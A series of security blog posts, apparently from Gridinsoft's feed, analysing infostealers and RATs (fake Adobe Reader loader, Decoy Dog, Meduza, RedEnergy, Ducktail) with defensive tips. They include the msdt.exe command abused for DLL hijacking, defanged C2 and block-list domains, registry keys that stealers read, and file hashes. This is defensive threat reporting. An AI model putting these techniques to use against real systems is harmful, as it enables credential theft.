Infostealer Spreads in Fake Adobe Reader Installers

The recent attack campaign detected by ASEC Intelligence Center starts with email spam. The messages have a PDF file attached to them, with their contents in Portuguese. This seriously narrows down the list of countries the campaign is targeting – to Brazil and Portugal. Inside of the file, there is a pop-up prompt to install Adobe Reader, which is allegedly required to open the document. Short side note – modern web browsers can handle PDFs of any complexity with ease.

Following the instruction of a document triggers the downloading of a file named Reader_Install_Setup.exe, which obviously mimics a legit installation file of the program. It even repeats the icon, which makes the fraud even harder to understand at this stage. Running the thing, which in fact is a loader, initiates the malware execution.

However, it does not happen instantly – malware performs a series of actions to pull the DLL hijack and run the final payload with the max privileges possible. First, it spawns an executable file and drops a DLL that contains actual payload and runs the msdt.exe process. The latter is a genuine Windows diagnostics tool that malware uses to call for a subordinate service.

C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes – code used to call for MSDT, specifically its Bluetooth Diagnostic tool

This service will consequently load a malicious DLL I’ve mentioned above. The library, in turn, runs the said executable file, legitimizing the infostealer and providing it with max privileges.

Stealer Malware Analysis

Even though the malware used in the campaign appears to be unique and does not belong to any of the known malware families, its functionality can barely be called unusual. This infostealer gathers basic info about the system, sends it to the command server and then creates a directory to store the collected data. Malware adds the latter to the list of Microsoft Defender exclusions, so it will not disrupt its operations. Also, it mimics the legit Chrome folder by adding a fake executable file and also some of the files typical for a genuine browser folder.

The C2 servers used by some of the samples confirms the attack targeting hypotheses I’ve mentioned above. Hxxps://thinkforce.com[.]br/ and hxxps://blamefade.com[.]br/ receive the AutoFill data from all the browsers. While this is less than what modern infostealers typically gather, it is still sensible – browsers keep almost all of our passwords.

How to protect against infostealer malware?

Information stealers never were an underdog of the malware world, and they remain a potent threat regardless of the circumstances. However, even though their samples may feature outstanding anti-detection tricks, they still need to get in. And this is where you can avoid them with max efficiency.

Be careful with emails. Email spam is probably going to be the most widespread malware delivery way of this decade. Users tend to believe their content or simply ignore the related risks, which inevitably leads to malware infection. Seeing such a sketchy offer to install a long-forgotten app or perform an action that is not normally needed with this type of documents should raise suspicion. At the same time, texts of such messages may be ridiculous enough to make the fraud apparent.

Use official software sources. It happens for certain files to require specific software, but try to use only official distributions of one. Going to the developer’s site and downloading one is not that longer when compared to clicking a link.

Have decent anti-malware software on hand. Malware finds new spreading ways pretty much every day. To avoid falling victim to the most tricky sample, a software that will not allow it to get in is essential. GridinSoft Anti-Malware is a program that will provide you with real-time protection and network filters with hourly updates. This security tool will make sure that malware will not even launch in the first place.

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

What is an Infostealer?

Infostealer is malicious software that collects information on a device it has infected and sends it to a threat actor. It explicitly targets login credentials saved in web browsers, browsing history, credit card and cryptocurrency wallet information, location data, device information, emails, social media platforms, and instant messaging clients – anything valuable.

When malware finds a valuable information, it saves the thing into a specifid directory on a disk. Then, at the end of the entire procedure, malware packs this directory and sends to the command server. The most valuable information threat actors seek is account details and banking card information. Also they can use this data or sell it on dark web markets. Infostealer logs are highly profitable on underground marketplaces, indeed it making them a prevalent form of malware.

Around 2020, infostealers got their minute of fame, which keeps going even today, in 2023. Such a surge defined 3 leaders of the “industry” – Racoon, Vidar, and RedLine Stealer. Also security experts have noticed that these types of malware have been utilized to steal ChatGPT accounts. This highlights how cybercriminals use stealers to gain access to individuals’ private information.

RedLine

In March 2020, RedLine appeared on the Russian market and quickly became a top seller in the logs category. This malicious software is designed to steal sensitive information from web browsers, including saved login credentials, autocomplete data, credit card information, and cryptocurrency wallets. Once it infects a system, RedLine thoroughly inventory the username, location data, hardware configuration, and installed security software. It is distributed through various means, including cracked games, applications, services, phishing campaigns, and malicious ads.

Raccoon

In 2019, the Raccoon Stealer was first introduced as a malware-as-a-service (MaaS) model and was promoted on underground forums. Later, scoundrels switched to selling their “product” in Telegram groups. In 2022, Raccoon received a new update whicwhich spruced up the detection evasion mechanismh and added new functionality. Interestingly enough that hackers community tend to dislike this infostealer and sprinkle it with dirt on forums. According to a belief, its admins steal the most “juicy” logs.

Vidar

Vidar is a classic example of a hit-and-run infostealer malware. In 2019, Vidar was first noticed during a malvertising campaign where the Fallout exploit kit was employed to disseminate Vidar and GandCrab as secondary payloads. This malicious software is sold as a standalone product on underground forums, and Telegram channels, and it includes an admin panel that allows customers to configure the malware and then keep track of the botnet.

Also this program is created using C++ and is based on the Arkei stealer. Vidar can extract browser artifacts, contents of specific cryptocurrency wallets, PayPal data, session data, and screenshots. Once done, it performs a so-called meltdown – in other words, simply removes itself from the machine.

Where can I get the infostealer?

Hackers may employ various methods to spread infostealers. Among the most prevalent techniques are different attack vectors, such as:

• Pirated software
  It is common for hacking groups to include malware with pirated software downloads. Infostealers and other types of malware have been distributed through pirated software before.

• Malvertising
  It’s common for exploit kits to target websites with malicious advertisements. If you click on one of these ads, you might unknowingly install an infostealer or be redirected to a website with malware available for download. Sometimes just viewing the malicious advertisement is enough to trigger the infostealer download.

• Compromised system
  As previously mentioned, infostealers are typically installed from a remote location once the attackers successfully access the target system. As a result a compromised system becomes an open book for hackers.

• Spam
  It is common for malicious individuals to send infostealers through email, often pretending to be a legitimate organization. The infostealer can either be attached directly to the email, or the recipient may be tricked into clicking on a harmful link, leading to the malware download. These spam emails are usually sent to large groups, but sometimes they can be customized for a specific individual or group.

How to Prevent your system from infostealers?

Here are some practices that can help lower the risk of getting infected with an infostealer:

• Install updates
  One way infostealers can be distributed is by using known browser vulnerabilities. To reduce the risk of this happening, it is vital to install updates for your operating system, browser, and other applications as soon as they become available.
• Think twice before clicking
  Be careful with opening files and clicking links to avoid infostealers. Because, they often spread through malicious email attachments and harmful websites. Don’t open unsolicited email attachments. Be cautious of emails that don’t address you by name. Check URLs before clicking them.
• Use multi-factor authentication
  Multi-factor authentication (MFA) is a valuable security feature that protects against unauthorized access to accounts, tools, systems, and data repositories. So, if someone steals your login credentials, MFA requires a secondary form of authentication, making it more difficult for a threat actor to access the compromised account. Secure password storage may be a useful add-on option as well.
• Avoid pirated software
  It is common for pirated software to contain malware, as it is a way for pirates to earn money. Therefore, it is best to use legitimate applications. Nowadays, there are numerous free, freemium, and open-source alternatives available that eliminate the need to take the risk of using pirated software.
• Have anti-malware software as a back-up. You never know what trick will hackers do next, and playing what-ifs is a bad idea. For that case, it is better to have a versatile tool on hand, which will help you with detecting and removing malicious programs. GridinSoft Anti-Malware is one you can rely on – give it a try.

The post Infostealers: How to Detect, Remove and Prevent them? appeared first on Gridinsoft Blog.

What is Decoy Dog Malware?

In April, Researchers discovered Decoy Dog, a remote access trojan (RAT) toolkit that uses DNS domains that act as command and control (C2) servers for the malware. It caused abnormal DNS signatures in enterprise networks across various regions, and some communications are being sent to a controller in Russia. Then researchers discovered DNS query patterns in enterprise networks that were not linked to consumer devices. They confirmed that the queries came from network appliances in only a few customer networks. Despite researchers announcement and technical analysis of this malware similarity to the Pupy open-source RAT, the toolkit’s operators continued their activity. At that time, had the following domains, which experts recommended organizations to block:

• claudfront[.]net
• allowlisted[.]net
• atlas-upd[.]com
• ads-tm-glb[.]click
• cbox4[.]ignorelist[.]com
• hsdps[.]cc

However, new research reveals that Decoy Dog significantly improves from Pupy, utilizing new domains, unique commands, and configurations that are not publicly available. Pupy is an open-source post-penetration remote access toolkit that emerged in 2015. Its primary purpose was serving a role of RAT in penetration testing simulations. The configs I mentioned as unavailable were hidden until 2019, and are related to the way malware resolves the C2 DNS. But even having the code, it was needed to perform a thorough name server setup for each malware run – which is a complicated task worthy of network engineers.

Decoy Dog Is a Better Pupy RAT

Researchers have been investigating the differences between Decoy Dog and Pupy since April. They set up their own C2 server for Pupy to analyze its DNS communication protocol. Thus, they could create DNS signatures to detect new controllers of this malware. Pupy and Decoy Dog both use nonces to identify sessions with clients and establish the ordering of messages. However, the subject uses the same query structure as Pupy. So, researchers decoded nonce values and correlated queries to the same compromised device.

Moreover, researchers could track each controller’s activity, including the sessions’ length and number of active clients. Unfortunately, encryption prevented researchers from seeing the specific data communicated, but they identified the types of messages sent and profiled the overall communication behavior of both clients. Decoy Dog responds to replays, while Pupy does not and has a richer set of commands and responses. The malware also exhibits more variance in message payload length than Pupy.

From this, researchers confirmed that Decoy Dog is a major refactor of Pupy with advanced capabilities that have changed over time. It includes a domain generation algorithm and the ability for clients to execute arbitrary Java code. These features indicate sophistication and intentionality beyond many threat actors. Security vendor detectors still identify Decoy Dog as Pupy, possibly Since reverse engineers assumed the binary samples were identical.

Today’s activity

Decoy Dog’s creators quickly adjusted their system in response to its initial disclosure. Malware has expanded its reach, with at least three different actors now using it. Thus, they ensured uninterrupted operations and still access to previously compromised devices. Though based on the open-source RAT Pupy, researchers have identified Decoy Dog as a new and previously unknown form of malware with advanced features that allow it to persist on compromised machines. Today research shows how Decoy Dog significantly improved over Pupy. The former utilizes unique commands and configurations that are not publicly available. TAs use it in ongoing nation-state cyber-attacks through DNS to establish Command and Control.

While much about Decoy Dog remains unclear, specialists determined that the malware can only be detected through DNS threat detection algorithms. At least three threat actors have been identified using this malware based on the open-source remote access trojan called Pupy. However, significant changes to the code suggest the involvement of a sophisticated black hat. The security firm stated that the subject can respond to complex DNS requests that do not follow the typical communication structure. In addition, they specified that Pupy, which is associated with Decoy Dog, is a cover-up for the actual abilities of the program.

Threat Actors Use Decoy Dog for Precise Hacking

Based on the analysis of passive DNS traffic, analysts have difficulty determining the exact number of Data Dog targets and affected devices. However, the lowest and highest number of active concurrent connections detected by investigators on any one controller were 4 and 50, respectively. In addition, the number of compromised devices is less than a few hundred. This indicates a minimal target list, typical of a reconnaissance operation. In any case, experts suggest that well-secured and sophisticated attackers are using the malware.

The attackers are likely targeting specific organizations with high information value. As mentioned above, there is a possibility that the victims are located in Russia. However, experts do not rule out that the attackers directed the victims’ traffic through this region as bait or to limit requests to relevant ones. Since it is quite difficult to change this system in modern networks, Decoy Dog behaves similarly to Pupy and uses the default recursive resolver to connect to DNS.

Safety recommendations

Security measures against Decoy Dog are generally similar to basic cyber security recommendations. However, there are key points to consider first. Here are some safety recommendations against this malware:

• Keep your software up to date. Auto-update should be enabled by default because it includes security patches that can help to protect your devices from malware.
• Use a firewall and antivirus software. A firewall can help to block unauthorized traffic from reaching your devices, and antivirus software can help to detect and remove malware.
• Be careful on the web. Look at what websites you visit and what links you click on. Decoy Dog can be spread through malicious websites and links.
• Use strong passwords and change them regularly. While this is a general recommendation, it is essential because strong passwords can protect your accounts from unauthorized access.
• Be aware of the signs of malware infection. Some symptoms include the computer running slowly, pop-ups and new programs appearing that you didn’t initiate, your browser settings changing, and files disappearing.

If you think your computer may be infected with Decoy Dog, contact your IT security team immediately. They will be able to help you to remove the malware and protect your organization from further attacks.

Web safety tips

Here are some additional tips to help you stay safe while web surfing:

• Use VPN when connecting to public Wi-Fi. This will help to protect your traffic from being intercepted by malicious actors.
• Be careful about what information you share online. Don’t share your personal information, such as your Social Security or credit card number, with websites or individuals you don’t trust.
• Please educate yourself about malware and how to protect yourself from it. Forewarned is forearmed. There is a lot of helpful, valuable information in the public domain today to help you keep up to date with the latest developments in cybersecurity.

By following these tips, you can help to protect yourself from Decoy Dog and other malware.

The post Decoy Dog Malware Uncovered: Next-Gen Spyware appeared first on Gridinsoft Blog.

What is Meduza Stealer?

Meduza is an all-encompassing infostealer, which is somewhat similar to the old guard at a glance. However, well-known things such as Redline or Raccoon stealers gained the ability to steal cryptocurrency information only with further updates. Meduza, on the other hand, can do this out-of-box, with the ability to circumvent more tricky protection measures of crypto apps. Moreover, it includes a much bigger list of wallets and browsers it can extract data from than any of the mentioned stealers.

The distinctive feature of Meduza Stealer is the way it hides its samples. Instead of a usual packing, hackers use code obfuscation and recompiling, which allows them to circumvent even the most robust anti-malware engines. Well, these approaches do not sound like something phenomenal, but when applied together, and in an unusual way, things may become way less predictable – and detectable.

Though, this is not the full list of unusual things for this malware. In price, the malware offers 2 fixed plans and a negotiable lifetime license. For $199 you receive malware, all possible customization options for the payload, admin panel, and the ability to download all the logs in one click, for the term of 1 month. Hackers offer the same stuff for $399 for 3 months. And the cherry topping, as I said, is the ability to negotiate the prices of a lifetime license for this malware. Probably, malware developers are even ready to share the source code – but that is only a guess since there were groups that used such a model earlier.

An Offspring of Aurora Stealer?

There are plenty of examples of how brand-new malware may be a re-branded old sample, with a slightly different team of crooks behind it. Malware is rarely developed by a single person. Developers of one malware may start working on another, and bring their prior developments in a new product. Alternatively, a part of a cybercrime gang that stopped functioning may decide to resume their illegal deeds – and they rebrand their “tools” to start with a new image. This or another way, is a common occasion there.

In the case of Meduza Stealer, things are not that straightforward. Due to the use of enhanced obfuscation, it is hard to say whether it shares any code details with known malware families. Some malware analysts claim that Meduza is an offspring of Aurora Stealer – malware that popped out in late 2022. Their main arguments are similarity in the form of C2 calls and logs with collected data.

As you can see, Meduza’s logs resemble Aurora’s by the ASCII-styled header and some visual elements. However, it is not a definitive thing – malware developers sometimes inspire with or completely copy things from other malware families. Other details that researchers put under the suspect are file naming policies – but this is not the brightest proof as well.

This, however, caused a harsh reaction from malware developers. In their “support” channel they called all the proofs rubbish, and also said they picked up the trail of one who leaked the malware build. Also, there was decent evidence that proves Meduza’s originality – it is written in C++, which is not even close to the Golang used in Aurora Stealer.

Meduza Stealer Analysis: Catch Me or I Catch You

The threat that comes from each specific malware sample roughly depends on two factors: how hard it is to detect it and how much damage it can deal. Meduza Stealer tries to outpace its counterparts in these two factors. It is not the most stealthy malware, for sure, and there are ones that steal even more data, but rare samples may boast of a combination of these two. And Meduza does.

In the picture above you can see the simplified scheme of the Meduza Stealer operation process. First of all, it checks the geolocation of the attacked system by its IP address. There lies another unusual feature of this malware — it has a typical ban list of countries for malware from Russia, though it does not include Ukraine. Instead, malware will exit once the IP of the attacked system is in Georgia. The latter has become quite a popular destination among Russians who try to avoid enlistment in the army. Overall, malware will not run in Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Turkmenistan.

The very next step is contacting the C2 server. This step is not very common among stealers, as they prefer to knock back the C2 only after succeeding with data stealing. Instead, Meduza contacts the server immediately after ensuring that the system is not in the forbidden location – but without any strict actions. Malware sends the blank POST request, that does not receive any response from the server. Only once the connection is successful, malware will keep going.

Data Gathering

As I said, Meduza is distinctive for an outrageously wide number of web browsers, desktop apps, and crypto-wallets it can rummage through. More common malware samples usually stop on the most popular apps and wallets, including some from alternative options. This one, however, does not disdain even underdogs. Kinza, Mail.ru, Atom, Amigo – some of them are even considered PUPs by security vendors, and I bet you didn’t even know that some of them exist.

List of browsers Meduza gathers data from:

Browsers commonly have different ways to handle passwords and autofill info – and the malware has its approach for each one. For ones that store such data in databases, malware prepares an SQL database request, which simply extracts all the valuables. Other, less secure browsers, keep this info in a plain text file – which is not a big quest to find.

One more point of interest for stealer malware in web browsers is cookie files. Cookies can contain different things – from almost useless shopping cart contents to session tokens, usernames, emails, and the like. Cookie files can have a great value when it comes to data stealing – especially when they are fresh. One may say – just the like real ones.

Desktop apps

Aside from web browsers, Meduza Stealer gathers information from several desktop applications, namely Telegram, Steam, and different Discord clients. To put its hands on Steam session tokens, malware gets to the program’s registry key in the CurrentUser branch. The HKCU\Software\Valve\Steam key contains a lot of info, aside from login data and session information – so malware does not go purely for the account.

Telegram does not keep login details in such an accessible form, though malware manages to gather sensitive information similarly. By checking these two keys, Meduza can get information about the system kept in Telegram session info, app versions, usernames, and other important stuff.

Discord is also a tough nut when it comes to grabbing session info. For that reason, malware limits to only system info recorded in a session, app configurations, and the like. This, contrary to two other apps, is done directly in the programs’ folder. Malware attacks several different editions of Discord, as the free API allows the creating of forks and user modifications.

2FA Extensions

Well, did I say that Meduza is ravenous when it comes to data gathering? Hold your 2FA browser extensions close to your body – the malware hunts them as well. The list of add-ons it targets is not as big as that of browsers, though there are not many of them present.

Cryptocurrency wallets

Gathering data about crypto wallets was not a widespread thing among older-gen stealers. With time, most of the families we know and love adopted such functionality. Modern-gen ones have them present by default, and it probably makes up for the number of names they can gather info from.

This extensive list contains crypto wallets that can have both desktop and in-browser forms. In such cases, malware treats them in a separate way – by collecting data from registry entries they leave. Here are some examples of keys the malware can read to collect login data from your crypto wallet:

System fingerprinting

To distinguish between the attacked systems, stealers commonly collect some trivial info about the system. Meduza is not an exclusion – it collects all the basic things that can identify the computer among others.

Another application for such data comes into view when we remember that Meduza can also collect browser cookies. The combination of cookies, passwords, and system information allows for creating a complete copy of the device – at least from the POV of the website. There even were Darknet services dedicated specifically to the system profile spoofing – you input the cookies and system specs, and it makes your system indistinguishable from the original one. This helps with circumventing the most sophisticated protection mechanisms.

Data extraction

All the data Meduza Stealer manages to collect from the infected system is stored in a specific folder, created after the malware unpacking and execution. When it comes to sending the data to the command server, malware archives this data and sends it to the server – nothing unusual there. Since malware uses a protected connection for the C&C communication, it is not that easy to detect the extraction process.

Contrary to the “classic” stealers, like Vidar, Meduza does not perform the meltdown once it finishes data collection. It keeps running in the background, performing periodic pings to the C2 and waiting for commands. There is a command for self-removal – but they are most likely sent only in exclusive cases.

How to protect against Meduza Stealer?

Actually, the ways to protect against Meduza are the same as in the case of any other stealers. However, there is a difference dictated by the exceptional detection evasion capabilities of this malware. For efficient prevention of Meduza stealer activity, a strong heuristic protection is essential.

Be careful with all things that can act as a malware source. Email spam or phishing posts in social media are among the most exploited ways of malware spreading. A less popular, but sometimes even more efficient approach is exploiting Google Ads in search results. Fraudsters will do their best to make you believe that the thing is legit, and you should not fear interacting with it.

Implement preventive anti-malware measures. To weed out malware with such an unusual detection evasion model the program should include a sturdy heuristic engine. Additionally, you can seek solutions with email protection functions and CDR applications. They help you to secure one of the possible attack vectors.

Avoid cracked software. Yet another place used for malware spreading is cracked programs – they have served this purpose for over two decades now. And even since its share shrunk in recent years, you can still get something nasty from there. You can get dropper malware through the program crack, and it will then inject any other thing – from spyware to ransomware.

The post Meduza Stealer: What Is It & How Does It Work? appeared first on Gridinsoft Blog.

Unveiling the Wise Remote Stealer

Revelations from cybersecurity experts have shed light on a concerning development in the underbelly of the internet—a burgeoning menace known as “Wise Remote“. This pernicious malware, operating as a Malware-as-a-Service (MaaS), has emerged as a highly adaptable and insidious tool. Its capabilities encompass remote access, DDoS botnet recruitment, data theft, and even extortion, raising the alarm for organizations and individuals alike.

The Stealthy Proliferation of Wise Remote Stealer

Since its initial appearance in early June, Wise Remote Stealer has been making waves across hacker forums such as HF and cracked-io. Its shadowy creators tirelessly refine and enhance their creation, showcasing its malevolence on platforms like Discord and Telegram. Disturbingly, these demonstrations have ensnared and impacted the lives of over a thousand unsuspecting victims, cementing its reputation as a significant threat.

Engineered using a combination of programming languages, including Go, C++, C#, and Python, Wise Remote primarily targets Windows systems—versions 8/10, and 11—in its crosshairs. Its developers exhibit an astute ability to elude conventional antivirus measures, employing various evasion techniques. To further cloak their operations, all communication with the command-and-control (C2) server, stationed in the secure confines of Switzerland, remains encrypted, ensuring anonymity.

The Tactical Ingenuity of Wise Remote

Wise Remote operates with calculated precision, showcasing a level of sophistication that sets it apart from other malicious tools. Through cloud-based module imports and strategic data storage within the victim’s disk, it carefully conceals its activities. Once the sensitive information has been exfiltrated, the malware meticulously erases all traces, leaving behind no digital footprints.

Subscribers to this nefarious service gain access to a comprehensive builder, allowing for customization and fine-tuning of the malware’s appearance and behavior. Remarkably, the resulting payloads rarely exceed 100 kilobytes, facilitating rapid dissemination and maximizing its reach.

The existing capabilities of Wise Remote Stealer are indeed alarming:

• Systematic collection of extensive system information, providing cybercriminals with a wealth of valuable data.
• Creation of a potent reverse shell, granting complete remote access and control over the compromised system.
• Facilitation of additional malicious file downloads and executions, enabling expansion of the attack surface.
• Extraction of critical data from web browsers, encompassing saved passwords, cookies, banking credentials, bookmarks, browsing history, and installed extensions, resulting in a treasure trove of personal information.
• Theft of funds from unsuspecting victims’ cryptocurrency wallets, inflicting significant financial damage.
• Seamless covert operation, opening and interacting with websites undetected, masquerading as legitimate user activity.
• Stealthy capture of screenshots, potentially compromising sensitive and confidential information.
• Utilization of the AppData folder as a discreet repository for surreptitiously uploaded files.
• Empowerment of attackers to customize and tailor malicious agents and modules to suit specific targets and preferred attack vectors.
• Camouflaging its tracks by manipulating system logs, erasing any trace of malicious activities, evading detection.

The Command Hub of Wise Remote

Serving as the central command hub, Wise Remote boasts a potent control panel that bestows unprecedented oversight and control over a vast network of up to 10,000 infected machines. With a single command, the operator can unleash devastating DDoS attacks or orchestrate a range of malicious activities, amplifying the disruptive potential of this malware.

As the cybersecurity community races to counter this emerging threat, the significance of Wise Remote becomes increasingly evident. Its adaptability, sophistication, and capacity for stealth underline the need for robust security measures and unwavering vigilance in today’s rapidly evolving digital landscape.

The post Wise Remote Trojan: Infostealer, RAT, DDoS Bot, and Ransomware appeared first on Gridinsoft Blog.

A malware called RedEnergy stealer uses a sneaky tactic to steal sensitive data from different web browsers. Its fundamental spreading way circulates fake updates – pop-ups and banners that bait the user to install what appears to be the malicious payload. RedEnergy also has multiple modules that can carry out ransomware activities. Despite using common method names, the malware has kept its original name. RedEnergy is classified as Stealer-as-a-Ransomware because it can function as a stealer and ransomware.

What is RedEnergy Malware?

RedEnergy is a malware designed to appear as a legitimate browser update, tricking users into downloading and installing it. It imitates well-known browsers like Google Chrome, Microsoft Edge, Firefox, and Opera, and once triggered, it deposits four files (two temporary files and two executables) onto the targeted system. One of these files contains a malicious payload and initiates a background process. The load displays an insulting message to the victim once executed.

Also, RedEnergy is malicious software that remains on an infected system even after restart or shutdown. This allows it to continue its harmful activities uninterrupted. As part of its operation, it also encrypts the victim’s data and adds the “.FACKOFF!” extension to all the encrypted files. It then demands payment from the victim to restore access to the files through a ransom message (“read_it.txt“) and changes the desktop wallpaper.

One of the things that the ransomware does is delete data from the shadow drive, which means that any backups are erased. In addition, the malicious software changes the desktop.ini file, which contains basic settings for file system folders. By doing this, RedEnergy can alter the appearance of the folders, making it easier to hide its activities on the system. Lastly, RedEnergy can also steal data from different web browsers, potentially giving it access to personal information, login details, financial data, online activities, session-related information, and other essential data.

Threat Summary

How does RedEnergy Malware work?

This threat campaign uses a deceitful redirection technique to trick users. When users try to access the targeted company’s website through their LinkedIn profile, they are unknowingly sent to a malicious website. On this website, they are asked to download what seems like a legitimate browser update, presented as four different browser icons. However, this is a trap, and the unsuspecting user downloads an executable file called RedStealer instead of an actual update.

A deceptive threat campaign uses a misleading download domain called www[.]igrejaatos2[.]org. The domain appears as a ChatGpt site, but it’s counterfeit and aims to trick victims into downloading a fake offline version of ChatGpt. Unfortunately, the zip file contains the same malicious executable as before, and victims unknowingly acquire it upon downloading.

How to avoid installation of RedEnergy Malware?

Individuals and organizations must exercise extreme caution when accessing websites, particularly those linked to LinkedIn profiles. Verifying browser updates’ authenticity and being wary of unexpected file downloads are paramount to protecting against such malicious campaigns.

To prevent negative consequences, there are several essential steps to take:

• Updating your operating system and software regularly.
• Essential to be cautious when dealing with email attachments or suspicious links, especially from unknown sources.
• Consider using reliable antivirus or anti-malware software to provide extra protection and conduct regular system scans.
• Avoid downloading files from untrusted websites and be wary of pop-up ads or misleading download buttons that may contain harmful content.

The post RedEnergy Stealer-as-a-Ransomware On The Rise appeared first on Gridinsoft Blog.

What is Ducktail Malware?

Ducktail is malware built on .NET Core that predominantly targets individuals and employees who may have access to a Facebook Business account. The Ducktail campaign is believed to have been active since 2018. However, the author became actively involved in developing and distributing malware related to the DUCKTAIL operation in the second half of 2021. The chain of evidence suggests that the attacker’s motives are driven by financial considerations and that the cybercriminal behind the campaign hails from Vietnam.

As mentioned at the outset, the primary targets of this stealer were individuals who hold senior positions in clothing, footwear, and cosmetics companies, as well as employees involved in digital marketing, digital media, and human resources. However, the author is believed to have recently updated the malware, expanding its capabilities. The new version of Ducktail is written in PHP. Now it targets users with any level of access to Facebook Business accounts.

How does it work?

The Ducktail malware is specifically designed to extract browser cookies and use social media sessions. In this way, the attacker obtains sensitive information from the victim’s social media accounts and over Social Media Business accounts respectively. The scammers then use the access to place advertisements for financial gain. We will now look at this process in more detail.

Delivery

To infect a target device, attackers use time-tested social engineering. I have repeatedly mentioned that the weakest link in any defense is the human factor, so this tactic will always be relevant. First, scammers place a malicious file on popular cloud storage. They typically use Google Drive, OneDrive, Mega, MediaFire, Discord, Trello, iCloud, and Dropbox. Next, they trick the victim into downloading and opening the malicious file. To do this, hackers contact the victim via social networks, and send a link to the archive. To make it look more legitimate, they pick a name like “Project Information And Salary Details At AVALON ORGANICS.zip”. Consequently, no suspicion is raised by the victim.

Inside the archive, there may be some thematic images (e.g., images of cosmetics, if it is a cosmetics company) and PDF or PDF document files. In reality, however, these are executable files disguised as documents, as can be seen by checking the file extension. These files are actual payloads – .NET assemblies that carry both executable sections and DLLs in it.

Info Stealing

Once launched, Ducktail scans web browsers, mainly Google Chrome, Mozilla Firefox, Microsoft Edge, and Brave Browser. The malware extracts all stored cookies as well as access tokens. It is also interested in information such as name, user ID, email address, and date of birth from the victim’s Facebook account. The malware scans registry data in HKLM\SOFTWARE\WOW6432Node\Clients\StartMenuInternet to get each installed browser’s name, path, and icon path.

Hacking process

Ducktail uses the victim’s social media session cookie and other security credentials obtained. This allows it to interact directly with other social media endpoints from the victim’s computer, extracting information from the victim’s social media account. In addition, the malware checks for two-factor authentication and, if positive, tries to obtain recovery codes. It can also steal access tokens, IP addresses, and user agents, data from commercial and advertising accounts connected to the victim’s personal account. This allows attackers to hijack these accounts and add their email addresses to gain admin and financial editor access.

While the former is self-explanatory, administrator rights give complete control over the Facebook Business account. Financial editor rights allow the change of credit card information and financial details of the business, such as transactions, bills, account charges, and payment methods. Because Ducktail accesses this information by sending requests from the victim’s computer, he impersonates a legitimate user and his session. This is achieved by masking its activity behind the victim’s IP address, cookie values, and system configuration. In addition to the data obtained, the malware attempts to get data from the Facebook Business page the following information:

• Payment initiated
• Payment required
• Verification Status
• Owner ad accounts
• Amount spent
• Currency details
• Account status
• Ads Payment cycle
• Funding source
• Payment method [ credit card, debit card, etc.]
• Paypal Payment method [email address]
• Owned pages.

Exfiltration

As C&C server, Ducktail uses Telegram messenger as a channel. Fraudsters use Telegram.Bot client library makes it easy to upload a file to a chat with a Telegram bot. Finally, the malware runs an infinite loop in the background, establishing a continuous exfiltration process.

How to protect yourself?

Ducktail is a narrowly targeted information thief that can have severe financial losses and identity theft. Its authors constantly make changes and improve delivery mechanisms and approaches to steal sensitive user information. However, the following tips can help you keep the chances of infection to a minimum:

• Only download applications from trusted sources. Please avoid URLs that may be used to spread malware, like Torrent or Warez.
• Use strong passwords and remember to update them regularly.
• Enable multi-factor authentication whenever possible.
• Use reliable antivirus and internet security software on all your devices, such as your PC, laptop, and workplace PC.
• Avoid opening links and email attachments unless you can verify their authenticity.
• Keep an eye on the network beacon to prevent data exfiltration by malware or TAs.
• Consider enabling Data Loss Prevention (DLP) solutions on your employees’ systems.

Ducktail IoCs

MD5:691ca596a4bc5f3e77494239fb614093
MD5:618072b66529c1a3d8826b2185048790
MD5:b4125e56a96e71086467f0938dd6a606

SHA1:20f53032749037caa91d4b15030c2f763e66c14e
SHA1:936139fc7f302e3895f6aea0052864a6cb130c59
SHA1:e692a626c6236332bd659abbd4b1479b860bf84a

SHA256:f024e7b619d3d6e5759e9375ad50798eb64d1d4601f22027f51289d32f6dc0ca
SHA256:2650e6160606af57bd0598c393042f60c65e453f91cde5ecc3d0040a4d91214d
SHA256:385600d3fa3b108249273ca5fe77ca4872dee7d26ce8b46fe955047f164888e7

The post Ducktail Infostealer Malware Targeting Facebook Business Accounts appeared first on Gridinsoft Blog.

What is spyware?

Spyware is any software that collects and transmits information covertly without the user’s consent. It is used to collect target information, usually passwords, credit card and financial information, system files, and sometimes for keylogging or screen captures. There are different types of spyware, and below, we’ll look at the most popular ones. We’ll also look at clear signs that you’re dealing with spyware examples, and give you some security tips.

Red Flags You’re Dealing With Spyware Examples

Unfortunately, it is tough to detect spyware without special tools. This malware type is designed specifically to be stealthy. Visual detection of its activity is an exclusive case, which still does not mean its successful removal. However, some red flags clearly indicate that there is something wrong with your device:

Your System Tools Are Disabled

An attentive user, suspecting the presence of malware, might run the task manager and try to find the culprit of abnormal PC behavior or check the settings with the registry editor. However, suppose you suddenly find that when you try to run these or other system tools, you get a message that your administrator has disabled them. In that case, it may well be an attempt to self-protect the malware on your system.

Strange processes in Task Manager

Although spyware works in stealth mode and reads information about the system, the user’s actions, and Internet activity, sometimes it can still show up somewhere or leave a trace in the form of a file. However, even if you find an uninvited guest in your system, you should not expect such a program to have a convenient removal function.

Suspicious network activity

Once the spyware collects enough data, it will send it to the attacker. Depending on the size of that data, your Internet speed may drop because the entire bandwidth will be taken up. In addition, if youhave a limited Internet plan, this can lead to additional costs. Additionally, at the stage of data extraction, you can witness a strange archive somewhere in your file system.

What types of spyware are there?

Although spyware is one category among many types of malware, it can be classified into several other categories. Hackers use different methods to spy on you. Below we will look at the most common ones:

Keyloggers

Keyloggers are probably one of the oldest forms of spyware. They can be either software or hardware. Their purpose is to intercept your keystrokes and transmit them to an intruder. This allows keyloggers to piece together everything you type. However, they are particularly interested in collecting passwords, social security numbers, or anything else that might enable them to impersonate you.

Password stealers

Password stealers are somewhat similar to keyloggers but a bit more sophisticated. Instead of recording all keystrokes, password stealers look for files that can contain a password. Their modus operandi can vary. Some of them are keyloggers at their core, but with the use of complex algorithms to detect certain chains of symbols you type. Others work like Trojan viruses waiting to steal passwords.

Info stealers

Hackers develop info stealers to aim certain data types directly on the victim’s computer. Info stealers often have a form of Trojan viruses. Once a victim activates an info stealer, it collects information from registries and files, including passwords and banking information or even compromising photos or videos. There are also examples of infostealers that aim precisely at a certain file type. Their general application is precise attacks upon a person who has valuable information on its PC.

Browser hijackers

